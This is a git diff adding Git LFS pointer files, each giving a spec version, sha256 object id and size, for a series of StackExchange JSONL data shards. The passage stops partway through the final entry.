a/data/stackexchange/1-1/600_2289.jsonl b/data/stackexchange/1-1/600_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1aca31d1692ee511dbd3bae2fcdd0f2b31881259 --- /dev/null +++ b/data/stackexchange/1-1/600_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3ee69b72b424dbb519a8973626b5d05156c0186f2d8bcace90a40bea4b8ff5a3 +size 41647105 diff --git a/data/stackexchange/1-1/601_2289.jsonl b/data/stackexchange/1-1/601_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b228b272fa1cfd20e9e90e9afcfcfdbdc95a65bb --- /dev/null +++ b/data/stackexchange/1-1/601_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bf81606ec619f7b1a123411fd70a1c9a610c75c13643f5d236f3924f16514ae3 +size 41804181 diff --git a/data/stackexchange/1-1/602_2289.jsonl b/data/stackexchange/1-1/602_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d2438fc4c90a1fd290664e0119c1a2298bd2fb7a --- /dev/null +++ b/data/stackexchange/1-1/602_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7f2e945ffcbd411908871c5e31f3d555a7419f5b9aac0e518e03d5e7f10753a2 +size 42101482 diff --git a/data/stackexchange/1-1/603_2289.jsonl b/data/stackexchange/1-1/603_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..75b077bd13df4210e301234d43ed66925c0a5cee --- /dev/null +++ b/data/stackexchange/1-1/603_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:481f488b22c14d999b14afdedfea50be581cf33d8734fb0725bb46cde1d287c6 +size 41962661 diff --git a/data/stackexchange/1-1/604_2289.jsonl b/data/stackexchange/1-1/604_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d9229eb4da0ceaf869d282e4a84f971e77a29992 --- /dev/null +++ b/data/stackexchange/1-1/604_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ffcc8c5764e0c42264d50282bb5d8132077823cc071c23bfa1be4c34f1ad4379 +size 42018513 diff --git a/data/stackexchange/1-1/605_2289.jsonl b/data/stackexchange/1-1/605_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c124e79d2270936589524d52ad04ec5fa6350994 --- /dev/null +++ b/data/stackexchange/1-1/605_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7de8063afbd2572aed48bcee876ca5ce1c4e7e325d263cb2740bff3cf8c29331 +size 41590354 diff --git a/data/stackexchange/1-1/606_2289.jsonl b/data/stackexchange/1-1/606_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..df509dc301a43f6badf69503daea0c0c59a81078 --- /dev/null +++ b/data/stackexchange/1-1/606_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b6d0a12078d467b7898aafedc7b7237a6be4e15c2c3de6daf8ff6fdba52ba6fa +size 41904205 diff --git a/data/stackexchange/1-1/607_2289.jsonl b/data/stackexchange/1-1/607_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..90a746a59bb2a100dfb542ee33e58f53a2b5ca90 --- /dev/null +++ b/data/stackexchange/1-1/607_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c766b5bc8bd3f1e2986c4a19832babe49a44a42a256a8b1148fa18c8f69075d8 +size 41515606 diff --git a/data/stackexchange/1-1/608_2289.jsonl b/data/stackexchange/1-1/608_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8e920cba7ca6be539c875e4cd0f7b2099efc0ec7 --- /dev/null +++ b/data/stackexchange/1-1/608_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:41c0ccfa099e789cbb4bfd89aa9bb04d5278dd9ed05e3afbac83ef55bafc2420 +size 42266228 diff --git a/data/stackexchange/1-1/609_2289.jsonl b/data/stackexchange/1-1/609_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d7118246940e54386b8a5ee4834fba6ee9655d1f --- /dev/null +++ b/data/stackexchange/1-1/609_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:48ea60b02e5cd1be8f26079697d12ebf4584b2f20bcf748e5951fb21fadf22d6 +size 42620685 diff --git a/data/stackexchange/1-1/60_2289.jsonl b/data/stackexchange/1-1/60_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0a57df10d9b796fab64f2d91ce31457d3065e2e0 --- /dev/null +++ b/data/stackexchange/1-1/60_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4fb7722cd7c90148c204b0ee181156e46823be050df7150162e54511af9ccca8 +size 38810941 diff --git a/data/stackexchange/1-1/610_2289.jsonl b/data/stackexchange/1-1/610_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f3979caab7e280a0d1edf6dc6723336c1c6268ba --- /dev/null +++ b/data/stackexchange/1-1/610_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:97d43304f31f72f041702bdab8f7ba2127bf25838a6593c43a125525cda32015 +size 42046389 diff --git a/data/stackexchange/1-1/611_2289.jsonl b/data/stackexchange/1-1/611_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c85715fa7d4b7a1ba7ebb69fd761dcd51011ab64 --- /dev/null +++ b/data/stackexchange/1-1/611_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:586b682cbce41c2f9b48c2933319e92f0028a6190126bdb752deca0043adb499 +size 41720819 diff --git a/data/stackexchange/1-1/612_2289.jsonl b/data/stackexchange/1-1/612_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f3d419633f592fad8b67e239a0e58fa0f2da2691 --- /dev/null +++ b/data/stackexchange/1-1/612_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:02898e8b26dcb1ff993691c9edcb770e352c093c704a291ee54a4b0cfe5780ba +size 41701659 diff --git a/data/stackexchange/1-1/613_2289.jsonl b/data/stackexchange/1-1/613_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..35a4c15689e36f2324bfb81b4b9777df9ada2f7f --- /dev/null +++ b/data/stackexchange/1-1/613_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8dacbf371a46f1617c3988f29a22bb50165fe6f6031ef1b4f0608162f5783c24 +size 42051405 diff --git a/data/stackexchange/1-1/614_2289.jsonl b/data/stackexchange/1-1/614_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bc0d06dcebaf55f411d59ba165710f9c2ec9d661 --- /dev/null +++ b/data/stackexchange/1-1/614_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ddb3e840048ec59649d81f17e8373504e475cc1512ff90d448836f0582250383 +size 41071143 diff --git a/data/stackexchange/1-1/615_2289.jsonl b/data/stackexchange/1-1/615_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1f2d5f8e394348d8ff9fdca288e6a1ed0ddd8ff0 --- /dev/null +++ b/data/stackexchange/1-1/615_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:21286beb8ce3b00410b0c590f3a768b46c8625b1f2a5932f099d6b2af183340a +size 41093522 diff --git a/data/stackexchange/1-1/616_2289.jsonl b/data/stackexchange/1-1/616_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..27e8947757efc99ca8590d3b6e1b8e54e82e5bc1 --- /dev/null +++ b/data/stackexchange/1-1/616_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:91b7b79e08afbd177111c8e650f65be0564b47ca38329a4031e3446c97f0c06b +size 41722570 diff --git a/data/stackexchange/1-1/617_2289.jsonl b/data/stackexchange/1-1/617_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5e51ca5f1e03cb9d021178905bd0ba6565b646e3 --- /dev/null +++ b/data/stackexchange/1-1/617_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dd9ee5fae871ebc617f467260cc7a9fa0a1e9dbdbf16955b92d1ac7daa9c0c38 +size 41827798 diff --git a/data/stackexchange/1-1/618_2289.jsonl b/data/stackexchange/1-1/618_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6db0df421f9eb4d44565bf8805dd1a9127b6a4cc --- /dev/null +++ b/data/stackexchange/1-1/618_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:10559f2411c0e6db7f5f466e16615114d028262c6bfeac9c39e8b7d318ef0606 +size 42277515 diff --git a/data/stackexchange/1-1/619_2289.jsonl b/data/stackexchange/1-1/619_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ad9287e022bdbb9c9519e1ca6be8c0ac529a9f54 --- /dev/null +++ b/data/stackexchange/1-1/619_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:87262b594f49390a64107624930e4ca24a751ec8d03a846a7f9553e9fb84514c +size 41991826 diff --git a/data/stackexchange/1-1/61_2289.jsonl b/data/stackexchange/1-1/61_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..10d2522655d7068ae581d5af22bcf72526830e7e --- /dev/null +++ b/data/stackexchange/1-1/61_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b82ba4a746ba7a59389c0ecdf09c09fcb7172bd420484d5e8240596a3494838d +size 39724324 diff --git a/data/stackexchange/1-1/620_2289.jsonl b/data/stackexchange/1-1/620_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..907b91cefcd81422d21881ff9b6b11a9e9963785 --- /dev/null +++ b/data/stackexchange/1-1/620_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2b97bb90205cbeaf2cf67100ac6f881ea455e368a4a4e4c193609be7ce528bbb +size 41032725 diff --git a/data/stackexchange/1-1/621_2289.jsonl b/data/stackexchange/1-1/621_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d125465c9cbd37a5f07ab5b86cd283480d458fcb --- /dev/null +++ b/data/stackexchange/1-1/621_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f6e080638660fb530ae7b147bda203db01e7a724d166f9fc4f22561f0008765c +size 41352612 diff --git a/data/stackexchange/1-1/622_2289.jsonl b/data/stackexchange/1-1/622_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..074733fefecd3525599e8be60f6929d8e89d3c17 --- /dev/null +++ b/data/stackexchange/1-1/622_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bab724bc8bc4364fae60a6a8f2077c364ae254e6946572df7c69475fc5f94317 +size 41594900 diff --git a/data/stackexchange/1-1/623_2289.jsonl b/data/stackexchange/1-1/623_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..161f1e81e7c7e69e67e90ce965455adfb16a0a6e --- /dev/null +++ b/data/stackexchange/1-1/623_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5ad6f37f0aa3a6124d977e5adaaa7ab08dbf780f6fc8e40cc6509d3b8de121ce +size 42091623 diff --git a/data/stackexchange/1-1/624_2289.jsonl b/data/stackexchange/1-1/624_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..111b1b4e68d4edc39dfe281a08affe0953fe1445 --- /dev/null +++ b/data/stackexchange/1-1/624_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b9f0f6851868cbb4e7c08ff7911eb8a53c8a3ee76dae15c180d3142fcb4b9e4b +size 42023969 diff --git a/data/stackexchange/1-1/625_2289.jsonl b/data/stackexchange/1-1/625_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8db51bdcbd7d3a6920fe0b32d734484fe991fca7 --- /dev/null +++ b/data/stackexchange/1-1/625_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f4868aa11797ac78b69ec5a5ddc3f03d2afb540e062245207a8da2231b43609a +size 41159650 diff --git a/data/stackexchange/1-1/626_2289.jsonl b/data/stackexchange/1-1/626_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0e6bed4a789dd1ddded4b53f98d45991ce1520da --- /dev/null +++ b/data/stackexchange/1-1/626_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8e2226233511268bf24b50cacd17318c57acb9a7635c55c15c30afb5e42d4f7e +size 41265755 diff --git a/data/stackexchange/1-1/627_2289.jsonl b/data/stackexchange/1-1/627_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f0779cb08263e0c07c667aaab1894aea8f348867 --- /dev/null +++ b/data/stackexchange/1-1/627_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cb939dc908228c67556deac92df919fe1c566961ddc8a76589d54cd8742d037b +size 41802470 diff --git a/data/stackexchange/1-1/628_2289.jsonl b/data/stackexchange/1-1/628_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8de7c0ea315a3f4ff331bc8e243273ab371484d0 --- /dev/null +++ b/data/stackexchange/1-1/628_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ee0602fb6601a877d07f92127f3d42e73edb993af0953f2329afe11963deffe2 +size 41963837 diff --git a/data/stackexchange/1-1/629_2289.jsonl b/data/stackexchange/1-1/629_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..db1faef67ed3cbde1a19cf8e4372b6aefd80295e --- /dev/null +++ b/data/stackexchange/1-1/629_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f9a567cf5a181b2dd078f155a632c5364e34fc0d4042c6411a5ed90d5e29ae6f +size 41896542 diff --git a/data/stackexchange/1-1/62_2289.jsonl b/data/stackexchange/1-1/62_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8272ce54cf6b36da5ac916b2a0756647dede4944 --- /dev/null +++ b/data/stackexchange/1-1/62_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ff177515d11c20980ef63f8126546bcbace12ca78152444627debbf05b8ee6ad +size 39981463 diff --git a/data/stackexchange/1-1/630_2289.jsonl b/data/stackexchange/1-1/630_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..689b050ce7021c916d1b07984677b8265638f280 --- /dev/null +++ b/data/stackexchange/1-1/630_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:857713e01f55cf8db4e961e26ac609bb0aa5ecdca3d8df6f1675b3cb230c7f92 +size 41851950 diff --git a/data/stackexchange/1-1/631_2289.jsonl b/data/stackexchange/1-1/631_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d608561937f7f7d5758614e41a9bd4ccac7b3e34 --- /dev/null +++ b/data/stackexchange/1-1/631_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1b3e6cdc6476ae18a845141c337b3b622321e393ddbe1a8ebbadc7f3ea9ae889 +size 41220827 diff --git a/data/stackexchange/1-1/632_2289.jsonl b/data/stackexchange/1-1/632_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a686d77792659417832a6145946197b025b6fbde --- /dev/null +++ b/data/stackexchange/1-1/632_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9092e7f6d507c48dacacb3b60dd10a95ed9eb55ce85ca91904e35391e2a45d7e +size 40785998 diff --git a/data/stackexchange/1-1/633_2289.jsonl b/data/stackexchange/1-1/633_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..953460ca5290d8c6ff1c33012a28e6421d91fbbc --- /dev/null +++ b/data/stackexchange/1-1/633_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b77b11297dc16135a1557721234dc1797b9255dd5127a2fad60efc22a17c6298 +size 42064015 diff --git a/data/stackexchange/1-1/634_2289.jsonl b/data/stackexchange/1-1/634_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5db8acbf59b38f02370b8028dff75eb0df5f4671 --- /dev/null +++ b/data/stackexchange/1-1/634_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:68b96defebdedca7b31fc730b142d7f874ffca2cb9b62f450d8bd52ff6e33000 +size 41274572 diff --git a/data/stackexchange/1-1/635_2289.jsonl b/data/stackexchange/1-1/635_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..222364d9faafb3f0acea021ae945214e3fca9f32 --- /dev/null +++ b/data/stackexchange/1-1/635_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a99f7dbd08e539d975adb050f3618b1f4d5c5aec967ce1239d7e685ec4dadd1a +size 41582658 diff --git a/data/stackexchange/1-1/636_2289.jsonl b/data/stackexchange/1-1/636_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c95c6e432f159edddbc72d1924b62720aa9ada02 --- /dev/null +++ b/data/stackexchange/1-1/636_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ee06c0955142a29da0259951e55b0667ef877c2f76e307e46a36945bdd67bf51 +size 41420319 diff --git a/data/stackexchange/1-1/637_2289.jsonl b/data/stackexchange/1-1/637_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3145edf33a9bb042d8af3f175b07b3f189d50c0f --- /dev/null +++ b/data/stackexchange/1-1/637_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b8704f83ac0d68c96e8e412d528e588f2f006c1425b90b740212bad2367b1f56 +size 42287611 diff --git a/data/stackexchange/1-1/638_2289.jsonl b/data/stackexchange/1-1/638_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e2b2af8216b1fa48c57c0feb62b0c2307372f753 --- /dev/null +++ b/data/stackexchange/1-1/638_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5ac6f872eea973ad4ace747cb51dc267180d026257ca65f817a756b45af2dc0c +size 41332995 diff --git a/data/stackexchange/1-1/639_2289.jsonl b/data/stackexchange/1-1/639_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..67de6980734fba3f692dac9f833f34517959e9f3 --- /dev/null +++ b/data/stackexchange/1-1/639_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a8e56376b298291c2c584e4b69257a1192467a4a42438f580280cbf0e26fa616 +size 41352437 diff --git a/data/stackexchange/1-1/63_2289.jsonl b/data/stackexchange/1-1/63_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2fd7fa38f2e7fa7b09ed67c4b6a7e7fb8453cbe3 --- /dev/null +++ b/data/stackexchange/1-1/63_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cada69dabb3c09830358dacd14e41faf3193718dca8896c3113330dcb69ecc33 +size 39456935 diff --git a/data/stackexchange/1-1/640_2289.jsonl b/data/stackexchange/1-1/640_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d74d5fa29c2962cbe299cbe1342b4832e1ab781b --- /dev/null +++ b/data/stackexchange/1-1/640_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5ef3880743edfee3b332a710f47bed4c48f2b6a18d677cc71ab0195931a7724f +size 40936692 diff --git a/data/stackexchange/1-1/641_2289.jsonl b/data/stackexchange/1-1/641_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c519e0f36a69645cca2840fbf0940a8899109ff7 --- /dev/null +++ b/data/stackexchange/1-1/641_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ced110875352fb84e8cc223694fcf5286071e1bbb958ad2f1ccea9de9e1bb3af +size 41381810 diff --git a/data/stackexchange/1-1/642_2289.jsonl b/data/stackexchange/1-1/642_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..96e875b6fa8d86935e3084feec8796b5d08956c9 --- /dev/null +++ b/data/stackexchange/1-1/642_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7825936735c1317ccdbd07373a6c8735c9d85c7b244280ee29beb288f03b79d6 +size 40943723 diff --git a/data/stackexchange/1-1/643_2289.jsonl b/data/stackexchange/1-1/643_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fd0a54edaa7a65862359d42b7e0b4a54be6eb41b --- /dev/null +++ b/data/stackexchange/1-1/643_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:336e27be9f5f5cbd98da3f587e30b7094b0ad55deec296037822ff0c53ffb6a2 +size 42115604 diff --git a/data/stackexchange/1-1/644_2289.jsonl b/data/stackexchange/1-1/644_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4d1ecc685a96106b08a4b75e8eae6deb84f04f8c --- /dev/null +++ b/data/stackexchange/1-1/644_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7eb8d5b37863026240c5da640beb3119cfe1b4880ff68a7d4b8b924fa962ceb4 +size 41914857 diff --git a/data/stackexchange/1-1/645_2289.jsonl b/data/stackexchange/1-1/645_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..988dee9a190528fb4165f0ebb453491c8eb15485 --- /dev/null +++ b/data/stackexchange/1-1/645_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:65197b4d30f2aac636ceb6e0614a8f947431414c62936f7deaf67b8f5e418fde +size 41554682 diff --git a/data/stackexchange/1-1/646_2289.jsonl b/data/stackexchange/1-1/646_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e8db43fde25986eb3f09ba6647ccce3588089d75 --- /dev/null +++ b/data/stackexchange/1-1/646_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:20c4456ddc925f12e1e189b209f77263824a2f27672cd720e010062f62f0168b +size 42052550 diff --git a/data/stackexchange/1-1/647_2289.jsonl b/data/stackexchange/1-1/647_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d2b7c1556d111a3c995ae0c2e0b3aac8ef6ac1ed --- /dev/null +++ b/data/stackexchange/1-1/647_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:20d74b9b6af842758dd661c76e7840b9d7dbf2380f75a9ee721c5dc23a8b945a +size 41849920 diff --git a/data/stackexchange/1-1/648_2289.jsonl b/data/stackexchange/1-1/648_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c0fb78fdfc0c21c9d369828d203312cc0adcc0cb --- /dev/null +++ b/data/stackexchange/1-1/648_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3698c582b64671986ecef6e14a851f4d41550f133f8930c0f234a341273f44f7 +size 41192608 diff --git a/data/stackexchange/1-1/649_2289.jsonl b/data/stackexchange/1-1/649_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..51f1983b5d520bf8a4f4b9af79b07b5bb822de4c --- /dev/null +++ b/data/stackexchange/1-1/649_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:272675af96dc700499ebe2f0e5374a2a4ac96c1216f5e80c8cc4461351953edd +size 41486201 diff --git a/data/stackexchange/1-1/64_2289.jsonl b/data/stackexchange/1-1/64_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..37bbc306b4b6d19a4a25f1851353ef0b41e31f01 --- /dev/null +++ b/data/stackexchange/1-1/64_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b5c9daa1d51e1d09542f7e00c3ef1527882ae8fb4567067b2b7d430c0e42b7d2 +size 39086328 diff --git a/data/stackexchange/1-1/650_2289.jsonl b/data/stackexchange/1-1/650_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cbb1a6b13cb72409fff171406c1ef3dbec7cbae9 --- /dev/null +++ b/data/stackexchange/1-1/650_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f13c6c00a412cbcbdd30a1ef98d5dd8f57ee10d85553ce6b38b72c810b3403f9 +size 37220956 diff --git a/data/stackexchange/1-1/651_2289.jsonl b/data/stackexchange/1-1/651_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2b0d3e704d4ecd99afdc274e0eba3a2c11dda5a4 --- /dev/null +++ b/data/stackexchange/1-1/651_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:72addbbf5f8035683cd1ea9d583420cd89b4a8377746f4de038dabac35f8e5cc +size 37669969 diff --git a/data/stackexchange/1-1/652_2289.jsonl b/data/stackexchange/1-1/652_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4fee56a00e62a66e9a79c02624d3e83e21740286 --- /dev/null +++ b/data/stackexchange/1-1/652_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5477a3c5a68adcc0b8c4a35bf6cee8811b08345b6a761bb4080dcbc8ed3a64d8 +size 37067170 diff --git a/data/stackexchange/1-1/653_2289.jsonl b/data/stackexchange/1-1/653_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fb1967fe4a7195a66a4c13092f65370d50dcc3a2 --- /dev/null +++ b/data/stackexchange/1-1/653_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2883c10000658efb992728a0743da91e8dd6b129938892e0b7769e3cc7759918 +size 37248603 diff --git a/data/stackexchange/1-1/654_2289.jsonl b/data/stackexchange/1-1/654_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e3b7c6d4a60e06c55f7917543c0f9c56918566ef --- /dev/null +++ b/data/stackexchange/1-1/654_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c9b9e1ed5931e82d171fe89410add7d8d276a6f9b439598bda48ad7f371bccc2 +size 36956061 diff --git a/data/stackexchange/1-1/655_2289.jsonl b/data/stackexchange/1-1/655_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..14db732eab950b4d54a0913e9cfb2f518d9ee777 --- /dev/null +++ b/data/stackexchange/1-1/655_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7f3815ad0038047772d7b6ab655c31770cbe5b74ad89d2b0f78c446b94d1e243 +size 37059674 diff --git a/data/stackexchange/1-1/656_2289.jsonl b/data/stackexchange/1-1/656_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c3cbfeace37f8e1f039f6b6a121d0be87046dc84 --- /dev/null +++ b/data/stackexchange/1-1/656_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:df696ca72acefe4a1d58f3a5d0b427381bf2a57fb4f677970c9ba57bfe978d3c +size 36939863 diff --git a/data/stackexchange/1-1/657_2289.jsonl b/data/stackexchange/1-1/657_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..99b6de704cf7be8f609d9ad5fb3e47596b79c7f9 --- /dev/null +++ b/data/stackexchange/1-1/657_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1c604b87aeee1b679d9fda3d62a64450d6731fa4e82da868fae9a2b9f3f1f743 +size 36198442 diff --git a/data/stackexchange/1-1/658_2289.jsonl b/data/stackexchange/1-1/658_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6d33bdf01416371e7f005481e36700fbc9d315a4 --- /dev/null +++ b/data/stackexchange/1-1/658_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:583e22165349e6ac1f20eddcc32d8ceaa7dca46838169e74e4dc082e6c19dcc4 +size 37248174 diff --git a/data/stackexchange/1-1/659_2289.jsonl b/data/stackexchange/1-1/659_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bf7e38637bb47fa94090458e0ce5bfad4a81555b --- /dev/null +++ b/data/stackexchange/1-1/659_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f7caacae9e7a8c4deff87942b8ec5a937becf73d3b944bde578a9ca41697c484 +size 37896071 diff --git a/data/stackexchange/1-1/65_2289.jsonl b/data/stackexchange/1-1/65_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..814909f330be1223ec7f8ded37f3694da8b6e9b8 --- /dev/null +++ b/data/stackexchange/1-1/65_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 